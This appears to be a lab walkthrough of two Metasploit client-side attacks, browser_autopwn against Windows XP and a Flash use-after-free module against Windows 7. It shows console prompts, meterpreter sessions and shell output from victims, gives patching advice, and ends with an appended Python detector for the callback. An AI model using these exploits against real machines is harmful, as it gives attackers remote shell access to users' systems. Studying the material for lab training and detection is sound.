Metasploit Browser Autopwn – Windows XP SP2
Victim: Windows XP SP3 (Java 6u25, IE6)
Step 1 – Starting the Browser Autopwn Server
Run msfconsole, load the browser_autopwn module and set all required options.
msf >
msf auxiliary(browser_autopwn) >
msf auxiliary(browser_autopwn) >
msf auxiliary(browser_autopwn) >
msf auxiliary(browser_autopwn) >
[*] Starting exploit modules on host 192.168.1.12...
[*] Server started.
The Browser Autopwn server is now running and waiting for victims to browse to the URL http://192.168.1.12
Step 2 – Pwning the Victim
On your Windows XP test machine (victim), browse to http://192.168.1.12.
This will trigger the browser_autopwn module to serve the appropriate exploit and launch a meterpreter session.
192.168.1.13:1045) at 2015-07-25 05:08:06 -0400
...
msf auxiliary(browser_autopwn) >
[*] Starting interaction with 1...
meterpreter >
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\Documents and Settings\IEUser\Desktop>
Victim
C:\Documents and Settings\IEUser\Desktop>
Windows IP Configuration
Ethernet adapter Local Area Connection:
Connection-specific DNS Suffix . : Home
IP Address. . . . . . . . . . . . : 192.168.1.13
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 192.168.1.1
C:\Documents and Settings\IEUser\Desktop>
You now have shell access to the Windows XP SP3 victim, with the same privileges as the user who navigated to the exploit URL.
Solution
Keep your software fully updated (e.g. Windows, web browsers, Java, etc.) and uninstall unused applications.
Metasploit Adobe Flash 18.0.0.203 Exploit – Windows 7 / Windows 8.1
Victim: Windows 7 Enterprise 32-bit (Adobe Flash Player 18.0.0.203, Firefox 39)
Step 1 – Starting the Exploit Server
Run msfconsole, load the adobe_flash_opaque_background_uaf module and set all required options.
msf >
msf exploit(adobe_flash_opaque_background_uaf) >
msf exploit(adobe_flash_opaque_background_uaf) >
msf exploit(adobe_flash_opaque_background_uaf) >
[*] Local IP: http://192.168.1.12:80/
[*] Server started.
Step 2 – Exploiting the Victim Machine
On your Windows test machine (victim), start Firefox and browse to http://192.168.1.12.
This will trigger the adobe_flash_opaque_background_uaf exploit and launch a meterpreter session.
[*] Sending stage (885806 bytes) to 192.168.1.11
[*] Meterpreter session 1 opened (192.168.1.12:4444 -> 192.168.1.11:49297) at 2015-08-01 04:39:34 -0400
msf exploit(adobe_flash_opaque_background_uaf) >
[*] Starting interaction with 1...
meterpreter >
Server username: IE8Win7\IEUser
meterpreter >
Listing: C:\
============
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
40777/rwxrwxrwx 0 dir 2013-10-23 12:22:56 -0400 $Recycle.Bin
40777/rwxrwxrwx 0 dir 2009-07-14 00:53:55 -0400 Documents and Settings
40777/rwxrwxrwx 0 dir 2009-07-13 22:37:05 -0400 PerfLogs
40555/r-xr-xr-x 0 dir 2015-08-01 03:32:42 -0400 Program Files
40777/rwxrwxrwx 0 dir 2015-08-01 03:32:42 -0400 ProgramData
40777/rwxrwxrwx 0 dir 2013-10-23 12:22:42 -0400 Recovery
40777/rwxrwxrwx 0 dir 2014-11-26 14:57:05 -0500 System Volume Information
40555/r-xr-xr-x 0 dir 2013-10-23 12:22:47 -0400 Users
40777/rwxrwxrwx 0 dir 2013-10-23 17:52:20 -0400 Wallpaper
40777/rwxrwxrwx 0 dir 2015-08-01 03:20:08 -0400 Windows
100777/rwxrwxrwx 24 fil 2009-06-10 17:42:20 -0400 autoexec.bat
100666/rw-rw-rw- 10 fil 2009-06-10 17:42:20 -0400 config.sys
100666/rw-rw-rw- 1073741824 fil 2015-08-01 04:01:24 -0400 pagefile.sys
Solution
Uninstall Flash Player.
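Detection side of the session shown above, as an added example that is not part of the original post: the victim browses to a host over HTTP and seconds later opens a connection to a non-web port (4444 in the output above) on that same host. The flow records, the record format, the 60-second window and the function names are assumptions constructed for illustration.

```python
from datetime import datetime, timedelta

# Constructed flow records (not from the original page): time, src, dst, dst_port.
# Addresses reuse the lab hosts that appear in the session output above.
SAMPLE_FLOWS = """\
2015-08-01T04:39:20 192.168.1.11 192.168.1.12 80
2015-08-01T04:39:34 192.168.1.11 192.168.1.12 4444
2015-08-01T04:40:02 192.168.1.14 192.168.1.20 80
2015-08-01T04:40:05 192.168.1.14 192.168.1.20 443
2015-08-01T04:41:00 192.168.1.15 192.168.1.12 80
2015-08-01T04:55:00 192.168.1.15 192.168.1.12 4444
"""

WEB_PORTS = {80, 443, 8080}      # ports treated as ordinary browsing (assumption)
WINDOW = timedelta(seconds=60)   # assumed correlation window


def parse_flows(text):
    """Yield (timestamp, src, dst, dst_port) from whitespace-separated lines."""
    for line in text.splitlines():
        parts = line.split()
        if len(parts) != 4:
            continue  # skip blank or malformed records
        ts, src, dst, port = parts
        yield datetime.fromisoformat(ts), src, dst, int(port)


def find_callbacks(flows, window=WINDOW, web_ports=WEB_PORTS):
    """Flag clients that browse to a host, then connect to a non-web port on it."""
    last_web = {}   # (src, dst) -> time of the most recent web request
    alerts = []
    for ts, src, dst, port in sorted(flows):
        key = (src, dst)
        if port in web_ports:
            last_web[key] = ts
        elif key in last_web and ts - last_web[key] <= window:
            alerts.append({"client": src, "server": dst, "port": port,
                           "delay_s": int((ts - last_web[key]).total_seconds())})
    return alerts


if __name__ == "__main__":
    for alert in find_callbacks(parse_flows(SAMPLE_FLOWS)):
        print(alert)
```

Only the first client is flagged in the sample data; the third reaches port 4444 fourteen minutes after its web request, outside the window.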